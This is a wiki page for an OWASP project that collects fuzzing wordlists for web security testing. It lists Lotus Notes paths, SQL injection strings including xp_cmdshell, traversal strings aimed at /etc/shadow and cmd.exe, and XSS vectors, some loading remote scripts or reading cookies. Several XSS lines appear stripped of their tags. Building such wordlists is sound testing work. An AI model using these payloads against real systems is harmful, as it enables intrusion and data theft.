Category:OWASP Fuzzing Code Database

This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like WebScarab and JBroFuzz with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added.

News
02 February 2010'


 * Created new Category Lotus/Notes Files

11 August 2009
 * Created new Category: XML Attacks

Update Statements


 * 15 new XML Statements
 * 93 new SQL Injections Statements
 * 67 new Traversal Directory Statements
 * Delete 33 XSS Statement Duplicate
 * 30 New XSS Statements

7 August 2009
 * Updated the objectives of the project.

21 July 2009


 * Set the team responsible for the project.

Goals
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer, Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.

In addition, the following functionalities will be included on this project:

1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases

An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:

1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.

2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.

3 - Possibility to support users on the report of their own experiences with the statements.

Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)
/852566C90012664F /admin4.nsf /admin5.nsf /admin.nsf /agentrunner.nsf /alog.nsf /a_domlog.nsf /bookmark.nsf /busytime.nsf /catalog.nsf /certa.nsf /certlog.nsf /certsrv.nsf /chatlog.nsf /clbusy.nsf /cldbdir.nsf /clusta4.nsf /collect4.nsf /da.nsf /dba4.nsf /dclf.nsf /DEASAppDesign.nsf /DEASLog01.nsf /DEASLog02.nsf /DEASLog03.nsf /DEASLog04.nsf /DEASLog05.nsf /DEASLog.nsf /decsadm.nsf /decslog.nsf /DEESAdmin.nsf /dirassist.nsf /doladmin.nsf /domadmin.nsf /domcfg.nsf /domguide.nsf /domlog.nsf /dspug.nsf /events4.nsf /events5.nsf /events.nsf /event.nsf /homepage.nsf /iNotes/Forms5.nsf/$DefaultNav /jotter.nsf /leiadm.nsf /leilog.nsf /leivlt.nsf /log4a.nsf /log.nsf /l_domlog.nsf /mab.nsf /mail10.box /mail1.box /mail2.box /mail3.box /mail4.box /mail5.box /mail6.box /mail7.box /mail8.box /mail9.box /mail.box /msdwda.nsf /mtatbls.nsf /mtstore.nsf /names.nsf /nntppost.nsf /nntp/nd000001.nsf /nntp/nd000002.nsf /nntp/nd000003.nsf /ntsync45.nsf /perweb.nsf /qpadmin.nsf /quickplace/quickplace/main.nsf /reports.nsf /sample/siregw46.nsf /schema50.nsf /setupweb.nsf /setup.nsf /smbcfg.nsf /smconf.nsf /smency.nsf /smhelp.nsf /smmsg.nsf /smquar.nsf /smsolar.nsf /smtime.nsf /smtpibwq.nsf /smtpobwq.nsf /smtp.box /smtp.nsf /smvlog.nsf /srvnam.htm /statmail.nsf /statrep.nsf /stauths.nsf /stautht.nsf /stconfig.nsf /stconf.nsf /stdnaset.nsf /stdomino.nsf /stlog.nsf /streg.nsf /stsrc.nsf /userreg.nsf /vpuserinfo.nsf /webadmin.nsf /web.nsf /.nsf/../winnt/win.ini /?Open

SQL Injection -(Update: 11 August 2009 - Total Statements: 126)
Statement 'sqlvuln '+sqlvuln sqlvuln; (sqlvuln) a' or 1=1-- "a"" or 1=1--" or a = a a' or 'a' = 'a 1 or 1=1 a' waitfor delay '0:0:10'-- 1 waitfor delay '0:0:10'-- declare @q nvarchar (4000) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A 0 031003000270000 declare @s varchar(22) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e exec(@s) a' ? ' or 1=1 ‘ or 1=1 -- x' AND userid IS NULL; -- x' AND email IS NULL; -- anything' OR 'x'='x x' AND 1=(SELECT COUNT(*) FROM tabname); -- x' AND members.email IS NULL; -- x' OR full_name LIKE '%Bob% 23 OR 1=1 '; exec master..xp_cmdshell 'ping 172.10.1.255'-- ' '%20or%20''=' '%20or%20'x'='x %20or%20x=x ')%20or%20('x'='x 0 or 1=1 ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # or 0=0 #" or 0=0 # ' or 1=1-- " or 1=1-- ' or '1'='1'-- ' or 1 --' or 1=1-- or%201=1 or%201=1 -- ' or 1=1 or ''=' or 1=1 or ""= ' or a=a-- or a=a ') or ('a'='a ) or (a=a hi or a=a hi or 1=1 --" hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a "hi"") or (""a""=""a" 'hi' or 'x'='x'; @variable ,@variable PRINT PRINT @@variable select insert as or procedure limit order by asc desc delete update distinct having truncate replace like handler bfilename ' or username like '% ' or uname like '% ' or userid like '% ' or uid like '% ' or user like '% exec xp exec sp '; exec master..xp_cmdshell '; exec xp_regread t'exec master..xp_cmdshell 'nslookup www.google.com'-- --sp_password \x27UNION SELECT ' UNION SELECT ' UNION ALL SELECT ' or (EXISTS) ' (select top 1 '||UTL_HTTP.REQUEST 1;SELECT%20* to_timestamp_tz tz_offset &lt;&gt;&quot;'%;)(&amp;+ '%20or%201=1 %27%20or%201=1 %20$(sleep%2050) %20'sleep%2050' char%4039%41%2b%40SELECT &apos;%20OR 'sqlattempt1 (sqlattempt2) %7C %2A%7C %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 ( %28 ) %29 & %26 ! %21 ' or 1=1 or =' ' or =' x' or 1=1 or 'x'='y / // //* a' or 3=3-- "a"" or 3=3--" ' or 3=3 ‘ or 3=3 --
 * (|(mail=*))
 * (|(objectclass=*))

Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)
Statement \..\WINDOWS\win.ini \..\..\WINDOWS\win.ini \..\..\..\WINDOWS\win.ini \..\..\..\..\WINDOWS\win.ini \..\..\..\..\..\WINDOWS\win.ini \..\..\..\..\..\..\WINDOWS\win.ini %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 ..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c ../../../../../../../../../etc/passwd ../../../../../../../../etc/passwd ../../../../../../../etc/passwd ../../../../../../etc/passwd ../../../../../etc/passwd ../../../../etc/passwd ../../../etc/passwd %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 ../../../.htaccess ../../.htaccess ../.htaccess .htaccess ././.htaccess %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 %2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 %2e%2e%2f%2e%68%74%61%63%63%65%73%73 %2e%68%74%61%63%63%65%73%73 %2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 ../../../../../../../../../../../../etc/hosts%00 ../../../../../../../../../../../../etc/hosts ../../boot.ini /../../../../../../../../%2A ../../../../../../../../../../../../etc/passwd%00 ../../../../../../../../../../../../etc/passwd ../../../../../../../../../../../../etc/shadow%00 ../../../../../../../../../../../../etc/shadow /../../../../../../../../../../etc/passwd^^ /../../../../../../../../../../etc/shadow^^ /../../../../../../../../../../etc/passwd /../../../../../../../../../../etc/shadow /./././././././././././etc/passwd /./././././././././././etc/shadow \..\..\..\..\..\..\..\..\..\..\etc\passwd \..\..\..\..\..\..\..\..\..\..\etc\shadow ..\..\..\..\..\..\..\..\..\..\etc\passwd ..\..\..\..\..\..\..\..\..\..\etc\shadow /..\../..\../..\../..\../..\../..\../etc/passwd /..\../..\../..\../..\../..\../..\../etc/shadow .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 \..\..\..\..\..\..\..\..\..\..\etc\shadow%00 ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 ..\..\..\..\..\..\..\..\..\..\etc\shadow%00 %0a/bin/cat%20/etc/passwd %0a/bin/cat%20/etc/shadow %00/etc/passwd%00 %00/etc/shadow%00 %00../../../../../../etc/passwd %00../../../../../../etc/shadow /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../../etc/passwd%00.html /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini \\&apos;/bin/cat%20/etc/passwd\\&apos; \\&apos;/bin/cat%20/etc/shadow\\&apos; ../../../../../../../../conf/server.xml /../../../../../../../../bin/id| C:/inetpub/wwwroot/global.asa C:\inetpub\wwwroot\global.asa C:/boot.ini C:\boot.ini ../../../../../../../../../../../../localstart.asp%00 ../../../../../../../../../../../../localstart.asp ../../../../../../../../../../../../boot.ini%00 ../../../../../../../../../../../../boot.ini /./././././././././././boot.ini /../../../../../../../../../../../boot.ini%00 /../../../../../../../../../../../boot.ini /..\../..\../..\../..\../..\../..\../boot.ini /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini \..\..\..\..\..\..\..\..\..\..\boot.ini ..\..\..\..\..\..\..\..\..\..\boot.ini%00 ..\..\..\..\..\..\..\..\..\..\boot.ini /../../../../../../../../../../../boot.ini%00.html /../../../../../../../../../../../boot.ini%00.jpg /.../.../.../.../.../ ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".

XSS Statements - Most effective/most common statements
Testing Statements ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83)) '';!--"=&{}

Common exploit code (covers a lot of XSS vulnerabilities) '>alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83));

=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162)

Statements </SCRIPT> "<IMG SRC=""javascript:alert('XSS');"">" <IMG SRC=JaVaScRiPt:alert('XSS')> "<IMG SRC=javascript:alert(""XSS"")>" "<IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`>" "<IMG """""">alert(""XSS"")</SCRIPT>"">" <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> "<IMG SRC=""jav" "ascript:alert('XSS');"">" "perl -e 'print ""<IMG SRC=java\0script:alert(\""XSS\"")>"";' > out" "perl -e 'print ""<SCR\0IPT>alert(\""XSS\"")</SCR\0IPT>"";' > out" "<IMG SRC="" &#14; javascript:alert('XSS');"">" "</SCRIPT>" "<BODY onload!#$%&*~+-_.,:;?@[/|\]^`=alert(""XSS"")>" "</SCRIPT>" "<alert(""XSS"");//<</SCRIPT>"   "<IMG SRC=""javascript:alert('XSS')""" <iframe src=http://ha.ckers.org/scriptlet.html < a=/XSS/\nalert(a.source)</SCRIPT> "\"";alert('XSS');//" "</TITLE>alert(""XSS"");</SCRIPT>" "<INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');"">" "<BODY BACKGROUND=""javascript:alert('XSS')"">" <BODY ONLOAD=alert('XSS')> "<IMG DYNSRC=""javascript:alert('XSS')"">" "<IMG LOWSRC=""javascript:alert('XSS')"">" "<BGSOUND SRC=""javascript:alert('XSS');"">" "<BR SIZE=""&{alert('XSS')}"">" "<LAYER SRC=""http://ha.ckers.org/scriptlet.html""></LAYER>" "<LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');"">" "<LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css"">" <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> "<META HTTP-EQUIV=""Link"" Content=""<http://ha.ckers.org/xss.css>; REL=stylesheet"">" "<STYLE>BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}</STYLE>" "<XSS STYLE=""behavior: url(xss.htc);"">" "<STYLE>li {list-style-image: url(""javascript:alert('XSS')"");}</STYLE><UL><LI>XSS" "<IMG SRC='vbscript:msgbox(""XSS"")'>" ¼script¾alert(¢XSS¢)¼/script¾ "<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');"">" "<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"">" "<META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');"">" "<IFRAME SRC=""javascript:alert('XSS');""></IFRAME>" "<FRAMESET><FRAME SRC=""javascript:alert('XSS');""></FRAMESET>" "<TABLE BACKGROUND=""javascript:alert('XSS')"">" "<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">" "<DIV STYLE=""background-image: url(javascript:alert('XSS'))"">" "<DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"">" "<DIV STYLE=""background-image: url(&#1;javascript:alert('XSS'))"">" "<DIV STYLE=""width: expression(alert('XSS'));"">" "<STYLE>@im\port'\ja\vasc\ript:alert(""XSS"")';</STYLE>" "<IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))"">" "<XSS STYLE=""xss:expression(alert('XSS'))"">" "exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'>" "<STYLE TYPE=""text/javascript"">alert('XSS');</STYLE>" "<STYLE>.XSS{background-image:url(""javascript:alert('XSS')"");}</STYLE><A CLASS=XSS></A>" "<STYLE type=""text/css"">BODY{background:url(""javascript:alert('XSS')"")}</STYLE>"

"<BASE HREF=""javascript:alert('XSS');//"">" "<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""></OBJECT>" <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> "<EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""></EMBED>" "<EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""></EMBED>" "<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>" "<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]></C></X> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" "<XML ID=""xss""><I><B><IMG SRC=""javascript:alert('XSS')""></B></I></XML><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>" "<XML SRC=""xsstest.xml"" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>" "<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSSalert(""XSS"")</SCRIPT>""></BODY></HTML>" "</SCRIPT>" "" "<? echo('<SCR)';echo('IPT>alert(""XSS"")</SCRIPT>'); ?>" "<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=alert('XSS')</SCRIPT>"">" "<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-" """ SRC=""http://ha.ckers.org/xss.js""></SCRIPT>" """ SRC=""http://ha.ckers.org/xss.js""></SCRIPT>" """ '' SRC=""http://ha.ckers.org/xss.js""></SCRIPT>" "'"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>" "` SRC=""http://ha.ckers.org/xss.js""></SCRIPT>" "<SCRIPT a="">'>"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>" "<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""http://ha.ckers.org/xss.js""></SCRIPT>" "<A HREF=""http://66.102.7.147/"">XSS</A>" "<A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"">XSS</A>" "<A HREF=""http://1113982867/"">XSS</A>" "<A HREF=""http://0x42.0x0000066.0x7.0x93/"">XSS</A>" "<A HREF=""http://0102.0146.0007.00000223/"">XSS</A>" "<A HREF=""h\ntt\tp://6" "<A HREF=""//www.google.com/"">XSS</A>" "<A HREF=""//google"">XSS</A>" "<A HREF=""http://google.com/"">XSS</A>" "<A HREF=""http://www.google.com./"">XSS</A>" "<A HREF=""javascript:document.location='http://www.google.com/'"">XSS</A>" "<A HREF=""http://www.gohttp://www.google.com/ogle.com/"">XSS</A>" "<div onmouseover=""document.write(""XSS-XSS-XSS"");"">" "<img src=""javascript:document.write(""XSS-XSS-XSS"");"">" "<input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">" "<bgsound src=""javascript:document.write(""XSS-XSS-XSS"");"">" "&{document.write(""XSS-XSS-XSS"");};" "<img src=&{document.write(""XSS-XSS-XSS"");};>" "<link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");"">" "<iframe src=""vbscript:document.write(""XSS-XSS-XSS"");"">" "<img src=""livescript:document.write(""XSS-XSS-XSS"");"">" "<a href=""about: document.write(""XSS-XSS-XSS""); "">" "<meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");"">" "<body onload=""document.write(""XSS-XSS-XSS"");"">" "<div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););"">" "<div style=""behaviour: url([link to code]);"">" "<div style=""binding: url([link to code]);"">" "<div style=""width: expression(document.write(""XSS-XSS-XSS""););"">" "<style type=""text/javascript"">document.write(""XSS-XSS-XSS""); " "<object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");"">" " " "<![CDATA[ " "< document.write(""XSS-XSS-XSS""); " "<img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");"">" " "" onmouseover=""document.write(""XSS-XSS-XSS"");"">" " " "<a href=""javascript#document.write(""XSS-XSS-XSS"");"">" "<img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">" "& document.write(""XSS-XSS-XSS""); " "<img src=""mocha:document.write(""XSS-XSS-XSS"");"">" "<div style=""binding: url([link to code]);""> [Mozilla]" " document.write(""XSS-XSS-XSS""); " "<xml src=""javascript:document.write(""XSS-XSS-XSS"");"">" "<xml id=""X""><a> document.write(""XSS-XSS-XSS""); ;</a> " "[\xC0][\xBC]script>document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script>" > " alert(""WXSS"") " "< alert(""WXSS"");//< " alert(document.cookie) '> alert(document.cookie) '> alert(document.cookie); "%3cscript%3ealert(""WXSS"");%3c/script%3e" %3cscript%3ealert(document.cookie);%3c%2fscript%3e %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E &ltscript&gtalert(document.cookie); &ltscript&gtalert(document.cookie);&ltscript&gtalert alert('WXSS') <IMG%20SRC='javascript:alert(document.cookie)'> "<IMG%20SRC=""javascript:alert('WXSS');"">" "<IMG%20SRC=""javascript:alert('WXSS')""" <IMG%20SRC=JaVaScRiPt:alert('WXSS')> <IMG%20SRC=javascript:alert(&quot;WXSS&quot;)> "<IMG%20SRC=`javascript:alert(""'WXSS'"")`>" "<IMG%20""""""><SCRIPT>alert(""WXSS"")</SCRIPT>"">" <IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG%20SRC='javasc "<IMG%20SRC=""jav" "<IMG%20SRC=""jav&#x09;ascript:alert('WXSS');"">" "<IMG%20SRC=""jav&#x0A;ascript:alert('WXSS');"">" "<IMG%20SRC=""jav&#x0D;ascript:alert('WXSS');"">" "<IMG%20SRC=""%20&#14;%20javascript:alert('WXSS');"">" "<IMG%20DYNSRC=""javascript:alert('WXSS')"">" "<IMG%20LOWSRC=""javascript:alert('WXSS')"">" <IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'> <IMG%20SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> 